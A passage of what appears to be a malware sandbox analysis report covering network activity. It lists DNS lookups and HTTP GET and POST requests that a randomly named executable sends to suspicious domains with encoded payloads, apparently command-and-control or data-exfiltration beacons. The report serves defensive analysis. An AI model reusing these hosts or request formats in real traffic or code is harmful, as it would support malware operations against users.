Jan 10, 2025 19:58:09.041313887 CET	50010	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:09.046255112 CET	80	50010	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:09.046473026 CET	50010	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:09.063870907 CET	50010	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:09.068640947 CET	80	50010	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:09.068847895 CET	80	50010	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:09.541362047 CET	80	50010	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:09.541552067 CET	80	50010	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:09.541594028 CET	50010	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:10.569245100 CET	50010	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:11.588754892 CET	50011	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:11.593698978 CET	80	50011	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:11.594264030 CET	50011	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:11.604494095 CET	50011	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:11.609273911 CET	80	50011	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:12.200310946 CET	80	50011	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:12.200340033 CET	80	50011	3.33.130.190	192.168.2.8
Jan 10, 2025 19:58:12.200670958 CET	50011	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:12.203447104 CET	50011	80	192.168.2.8	3.33.130.190
Jan 10, 2025 19:58:12.208345890 CET	80	50011	3.33.130.190	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 19:56:02.942271948 CET	60711	53	192.168.2.8	1.1.1.1
Jan 10, 2025 19:56:03.020643950 CET	53	60711	1.1.1.1	192.168.2.8
Jan 10, 2025 19:56:18.620340109 CET	49233	53	192.168.2.8	1.1.1.1
Jan 10, 2025 19:56:19.063185930 CET	53	49233	1.1.1.1	192.168.2.8
Jan 10, 2025 19:56:33.010468006 CET	63651	53	192.168.2.8	1.1.1.1
Jan 10, 2025 19:56:33.146049976 CET	53	63651	1.1.1.1	192.168.2.8
Jan 10, 2025 19:56:46.292563915 CET	62987	53	192.168.2.8	1.1.1.1
Jan 10, 2025 19:56:46.538738966 CET	53	62987	1.1.1.1	192.168.2.8
Jan 10, 2025 19:56:59.838712931 CET	51894	53	192.168.2.8	1.1.1.1
Jan 10, 2025 19:57:00.184462070 CET	53	51894	1.1.1.1	192.168.2.8
Jan 10, 2025 19:57:13.589245081 CET	56231	53	192.168.2.8	1.1.1.1
Jan 10, 2025 19:57:14.059793949 CET	53	56231	1.1.1.1	192.168.2.8
Jan 10, 2025 19:57:27.808049917 CET	64129	53	192.168.2.8	1.1.1.1
Jan 10, 2025 19:57:27.819399118 CET	53	64129	1.1.1.1	192.168.2.8
Jan 10, 2025 19:57:50.043459892 CET	57329	53	192.168.2.8	1.1.1.1
Jan 10, 2025 19:57:50.254213095 CET	53	57329	1.1.1.1	192.168.2.8
Jan 10, 2025 19:58:03.932523012 CET	52993	53	192.168.2.8	1.1.1.1
Jan 10, 2025 19:58:03.945794106 CET	53	52993	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 19:56:02.942271948 CET	192.168.2.8	1.1.1.1	0xfe28	Standard query (0)	www.dating-ml-es.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:56:18.620340109 CET	192.168.2.8	1.1.1.1	0xd984	Standard query (0)	www.jotchuadog.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:56:33.010468006 CET	192.168.2.8	1.1.1.1	0x8549	Standard query (0)	www.dating-apps-az-dn5.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:56:46.292563915 CET	192.168.2.8	1.1.1.1	0x2882	Standard query (0)	www.smartcongress.net	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:56:59.838712931 CET	192.168.2.8	1.1.1.1	0xb523	Standard query (0)	www.duyordu.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:57:13.589245081 CET	192.168.2.8	1.1.1.1	0x1939	Standard query (0)	www.gk88top.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:57:27.808049917 CET	192.168.2.8	1.1.1.1	0x706b	Standard query (0)	www.108.foundation	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:57:50.043459892 CET	192.168.2.8	1.1.1.1	0x8c	Standard query (0)	www.wintus.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:58:03.932523012 CET	192.168.2.8	1.1.1.1	0xc828	Standard query (0)	www.ampsamkok88.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 19:56:03.020643950 CET	1.1.1.1	192.168.2.8	0xfe28	No error (0)	www.dating-ml-es.xyz		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:56:19.063185930 CET	1.1.1.1	192.168.2.8	0xd984	No error (0)	www.jotchuadog.xyz	dns.ladipage.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 19:56:19.063185930 CET	1.1.1.1	192.168.2.8	0xd984	No error (0)	dns.ladipage.com		18.139.62.226	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:56:19.063185930 CET	1.1.1.1	192.168.2.8	0xd984	No error (0)	dns.ladipage.com		13.228.81.39	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:56:33.146049976 CET	1.1.1.1	192.168.2.8	0x8549	No error (0)	www.dating-apps-az-dn5.xyz		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:56:46.538738966 CET	1.1.1.1	192.168.2.8	0x2882	No error (0)	www.smartcongress.net	smartcongress.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 19:56:46.538738966 CET	1.1.1.1	192.168.2.8	0x2882	No error (0)	smartcongress.net		146.88.233.115	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:57:00.184462070 CET	1.1.1.1	192.168.2.8	0xb523	No error (0)	www.duyordu.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 19:57:00.184462070 CET	1.1.1.1	192.168.2.8	0xb523	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 19:57:00.184462070 CET	1.1.1.1	192.168.2.8	0xb523	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:57:14.059793949 CET	1.1.1.1	192.168.2.8	0x1939	No error (0)	www.gk88top.top		104.21.7.187	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:57:14.059793949 CET	1.1.1.1	192.168.2.8	0x1939	No error (0)	www.gk88top.top		172.67.137.47	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:57:27.819399118 CET	1.1.1.1	192.168.2.8	0x706b	No error (0)	www.108.foundation		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:57:27.819399118 CET	1.1.1.1	192.168.2.8	0x706b	No error (0)	www.108.foundation		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:57:50.254213095 CET	1.1.1.1	192.168.2.8	0x8c	No error (0)	www.wintus.top		162.0.213.94	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:58:03.945794106 CET	1.1.1.1	192.168.2.8	0xc828	No error (0)	www.ampsamkok88.shop	ampsamkok88.shop		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 19:58:03.945794106 CET	1.1.1.1	192.168.2.8	0xc828	No error (0)	ampsamkok88.shop		3.33.130.190	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:58:03.945794106 CET	1.1.1.1	192.168.2.8	0xc828	No error (0)	ampsamkok88.shop		15.197.148.33	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.dating-ml-es.xyz

www.jotchuadog.xyz

www.dating-apps-az-dn5.xyz

www.smartcongress.net

www.duyordu.xyz

www.gk88top.top

www.108.foundation

www.wintus.top

www.ampsamkok88.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49711	199.59.243.228	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:56:03.043490887 CET	447	OUT	GET /uxeg/?QzmLxn8=GxjMbRdPgQzN0XjXcotBxj2TfLFHu8ypKmNa5EKpEZ53nljhiE9yLLvZ3h1y+ouUdvV3oLNcZEK//dGb5DVKRCvqke0RGIMaaR0IR6fpgX04hXePp6sj2hKunKb0dr0WgA==&nbd8Y=hfD0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.dating-ml-es.xyz Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jan 10, 2025 19:56:03.569308996 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 18:56:02 GMT content-type: text/html; charset=utf-8 content-length: 1498 x-request-id: 87cf65ea-a505-4ffb-8daf-a29fc3fb95d7 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fU7I5B4QlzXBogL1LbTUBxRIJ5f7DUuT3WT8pqZPuH3WWNvnqRhr6xJMM8Il4vcW0wEkJ8g2wRP/QB97sqOJww== set-cookie: parking_session=87cf65ea-a505-4ffb-8daf-a29fc3fb95d7; expires=Fri, 10 Jan 2025 19:11:03 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 55 37 49 35 42 34 51 6c 7a 58 42 6f 67 4c 31 4c 62 54 55 42 78 52 49 4a 35 66 37 44 55 75 54 33 57 54 38 70 71 5a 50 75 48 33 57 57 4e 76 6e 71 52 68 72 36 78 4a 4d 4d 38 49 6c 34 76 63 57 30 77 45 6b 4a 38 67 32 77 52 50 2f 51 42 39 37 73 71 4f 4a 77 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fU7I5B4QlzXBogL1LbTUBxRIJ5f7DUuT3WT8pqZPuH3WWNvnqRhr6xJMM8Il4vcW0wEkJ8g2wRP/QB97sqOJww==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 19:56:03.569338083 CET	951	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODdjZjY1ZWEtYTUwNS00ZmZiLThkYWYtYTI5ZmMzZmI5NWQ3IiwicGFnZV90aW1lIjoxNzM2NTM1Mz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49712	18.139.62.226	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:56:19.099509001 CET	711	OUT	POST /jta9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.jotchuadog.xyz Origin: http://www.jotchuadog.xyz Content-Length: 208 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.jotchuadog.xyz/jta9/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 58 44 75 56 79 37 43 44 72 71 31 43 75 31 4f 6d 69 2b 75 57 71 51 4b 50 73 46 30 35 76 51 46 68 6a 6e 4f 5a 4f 74 4c 58 69 53 74 7a 6a 48 55 73 4b 30 6a 45 6e 34 48 61 62 45 76 51 32 67 63 71 39 59 4e 56 37 49 6e 58 57 37 48 69 4f 35 4c 44 38 46 72 35 6b 4f 59 64 49 64 64 39 76 41 45 55 35 76 33 64 51 6c 56 56 44 31 45 75 48 5a 6c 4b 4b 4a 43 63 68 76 64 64 49 59 50 6f 44 6b 79 50 53 7a 64 6f 34 52 4c 61 65 4f 4d 57 38 47 73 77 4b 2b 31 58 41 52 66 43 4f 44 53 66 33 4e 68 77 54 4a 37 31 37 59 66 48 34 45 77 68 41 38 71 64 43 4e 2f 39 61 63 6e 55 70 33 4b 67 77 4d 35 45 53 4b 79 4b 67 5a 73 3d Data Ascii: QzmLxn8=XDuVy7CDrq1Cu1Omi+uWqQKPsF05vQFhjnOZOtLXiStzjHUsK0jEn4HabEvQ2gcq9YNV7InXW7HiO5LD8Fr5kOYdIdd9vAEU5v3dQlVVD1EuHZlKKJCchvddIYPoDkyPSzdo4RLaeOMW8GswK+1XARfCODSf3NhwTJ717YfH4EwhA8qdCN/9acnUp3KgwM5ESKyKgZs=
Jan 10, 2025 19:56:20.061613083 CET	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 10 Jan 2025 18:56:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p Data Raw: Data Ascii:
Jan 10, 2025 19:56:20.061631918 CET	224	IN	Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f Data Ascii: pupx.ladi.me https://.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2025-01-10 18:56:19.89088171
Jan 10, 2025 19:56:20.061644077 CET	1236	IN	Data Raw: 37 20 2b 30 30 30 30 20 55 54 43 20 6d 3d 2b 31 31 36 32 32 32 35 2e 39 36 33 39 32 35 39 32 30 22 3b 20 45 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 30 38 20 4a 61 6e 20 32 30 33 35 20 31 38 3a 35 36 3a 31 39 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b Data Ascii: 7 +0000 UTC m=+1162225.963925920"; Expires=Mon, 08 Jan 2035 18:56:19 GMTSet-Cookie: LADI_CLIENT_ID=54b31287-f54d-4a7a-48f8-fa035490279e; Expires=Mon, 08 Jan 2035 18:56:19 GMTSet-Cookie: LADI_PAGE_VIEW=0; Path=/jta9; Expires=Mon, 08 Jan 203
Jan 10, 2025 19:56:20.061655045 CET	224	IN	Data Raw: 3b 20 50 61 74 68 3d 2f 6a 74 61 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 6a 74 61 Data Ascii: ; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT_PATH=; Path=/jta9;
Jan 10, 2025 19:56:20.061666012 CET	1236	IN	Data Raw: 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 43 4f 4e 46 49 47 3d 3b 20 50 61 74 68 3d 2f 6a 74 61 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f Data Ascii: Max-Age=0Set-Cookie: LADI_CAMP_CONFIG=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_END_DATE=; Path=/jta9; Max-Age=0Set-Cookie: LADI_FUNNEL_NEXT_URL=; Path=/jta9; Max-Age=0Set-Cookie: LADI_FUNNEL_PREV_URL=; Path=/jta9; Max-Age=0Set-Co
Jan 10, 2025 19:56:20.061680079 CET	346	IN	Data Raw: 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 46 4f 52 4d 53 55 42 4d 49 54 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 6a 74 61 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 Data Ascii: e: LADI_CAMP_BEHAVIOR_FORMSUBMIT_PATH=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_CONFIG=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_END_DATE=; Path=/jta9; Max-Age=0Statuscode: 502Strict-Transport-Security: max-age=31536000; includeS
Jan 10, 2025 19:56:20.062278986 CET	1236	IN	Data Raw: 31 34 30 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 3c db 8e db 48 76 bf 52 d6 62 a6 25 b8 a8 96 ba 5b 7d 91 5a 3d f1 38 4e 76 80 c1 8e 31 e3 d9 ec c2 70 8c 12 59 92 38 4d 91 34 49 f5 c5 da 7e 08 f2 98 87 60 9f f3 92 c1 60 10 20 40 80 20 c8 d3 fa Data Ascii: 140c<HvRb%[}Z=8Nv1pY8M4I~`` @ SU$d-YS^.</~'Tsv#E1Oo_u:;Mg](${1n=e[O?Elx>xi;-u/67E$H
Jan 10, 2025 19:56:20.062294006 CET	1236	IN	Data Raw: 1c ee ec 8c d2 47 01 4b 88 7d a5 d8 6a 43 4c c2 c2 98 0f d3 07 25 41 0b f4 c7 16 22 95 44 69 42 3c 0c 41 12 8b d8 12 74 61 91 c5 9c ef 96 b1 84 2e 05 50 53 15 d4 55 28 b9 1a 6b 6f ba 01 68 c9 14 22 27 6b ee 3a 0e f7 57 e9 fb 50 be df 08 47 69 25 Data Ascii: GK}jCL%A"DiB<Ata.PSU(koh"'k:WPGi%83W%)^\|9Vkn~WaO+P"SHmM:{\|[KuXM}j;h6aRz;FEP:uHqp-v1NG%61@pEk$F
Jan 10, 2025 19:56:20.062305927 CET	1236	IN	Data Raw: 5d 1e 60 fa 46 a8 6c ae 83 f7 89 cb a6 03 d7 d4 3c d8 ae 1b 2c e4 a0 07 8a cb b0 d3 56 0a bb a6 ae 07 3f c0 12 3c 90 6b f7 07 9f 7c a0 b5 35 d0 3a 9c 23 6d 2b 35 a2 b6 fd 7e ff 43 e5 fb 17 1f 63 b4 a1 c7 e2 c4 b2 f1 22 9b 3a 02 b3 d4 5c ff c8 5d Data Ascii: ]`Fl<,V?<k\|5:#m+5~Cc":\]6'iVSmzo=}Wz>O7#bl}JiGmrPbZsS;C]^Vw\=,pE2Tb&,i<#)7h\Or$j&exXG
Jan 10, 2025 19:56:20.062478065 CET	672	IN	Data Raw: 77 5c 46 da f9 b2 ef e8 10 6f 7d ae 54 b0 b6 f4 3c 51 9c 3b ee 8b cb f2 79 a7 b8 31 6a 0d a0 86 3c 26 83 de 27 9d 82 43 31 64 4a d1 0f 50 33 a6 96 10 cb 31 cb 56 9c 47 87 47 39 66 6a 93 44 71 1c 34 d5 92 b3 79 96 7e c3 ba 4a e7 f7 ac 24 fb 6a d0 Data Ascii: w\Fo}T<Q;y1j<&'C1dJP31VGG9fjDq4y~J$jx[YKxHK,M1Ys/.sRGe$&9(R(+m!l0{G0Lq@~1nmS;7oS=l%1?JX6B
Jan 10, 2025 19:56:20.062695980 CET	780	IN	Data Raw: 66 ba d0 5e ae cb a2 3a 9a 6d 0b d4 6e 78 90 ea ca 81 a0 c7 23 5a 7c 9c f3 78 57 e6 4d 46 1b 3e 3b 75 dc 0b 62 7b 2c 8e c7 2d 31 8a 4c 45 d5 92 15 28 87 54 ab 5a 85 66 8a ef 2d 1d c0 4e 8d 44 76 60 48 68 55 1d 2b f3 30 0a 8c 18 2f 57 bb e2 88 a9 Data Ascii: f^:mnx#Z\|xWMF>;ub{,-1LE(TZf-NDv`HhU+0/W8;eap*1_l%^O,w02>o`$}$wNN" z3r'_2gWwD-}$}_}#4.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49714	18.139.62.226	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:56:21.657421112 CET	731	OUT	POST /jta9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.jotchuadog.xyz Origin: http://www.jotchuadog.xyz Content-Length: 228 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.jotchuadog.xyz/jta9/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 58 44 75 56 79 37 43 44 72 71 31 43 76 56 65 6d 6b 5a 79 57 74 77 4b 4d 6f 31 30 35 68 77 46 74 6a 6e 79 5a 4f 73 2f 48 6c 67 5a 7a 6a 6e 45 73 59 6c 6a 45 6b 34 48 61 55 6b 76 52 72 51 63 31 39 59 78 33 37 4a 62 58 57 37 54 69 4f 35 62 44 38 79 2f 36 31 4f 59 54 52 74 64 2f 79 77 45 55 35 76 33 64 51 6c 41 49 44 31 38 75 48 4b 39 4b 62 59 43 64 39 2f 64 63 50 59 50 6f 48 6b 79 4c 53 7a 64 47 34 55 33 6b 65 4d 30 57 38 45 30 77 4c 76 31 55 62 42 66 45 44 6a 54 61 6b 50 6f 4f 62 4b 6d 57 33 6f 2f 6e 34 56 73 37 49 71 62 33 59 76 33 37 5a 63 50 2f 70 30 69 57 31 37 6b 73 49 70 69 36 2b 4f 37 76 30 48 79 4e 6b 77 62 59 5a 41 4d 77 4f 5a 30 32 6e 45 6f 4b Data Ascii: QzmLxn8=XDuVy7CDrq1CvVemkZyWtwKMo105hwFtjnyZOs/HlgZzjnEsYljEk4HaUkvRrQc19Yx37JbXW7TiO5bD8y/61OYTRtd/ywEU5v3dQlAID18uHK9KbYCd9/dcPYPoHkyLSzdG4U3keM0W8E0wLv1UbBfEDjTakPoObKmW3o/n4Vs7Iqb3Yv37ZcP/p0iW17ksIpi6+O7v0HyNkwbYZAMwOZ02nEoK
Jan 10, 2025 19:56:22.609428883 CET	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 10 Jan 2025 18:56:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p Data Raw: Data Ascii:
Jan 10, 2025 19:56:22.609502077 CET	1236	IN	Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f Data Ascii: pupx.ladi.me https://.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2025-01-10 18:56:22.440387163 +0000 UTC m=+1162
Jan 10, 2025 19:56:22.609513044 CET	1236	IN	Data Raw: 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 6a 74 61 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f Data Ascii: t-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/jta9; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/jta9; Max-A
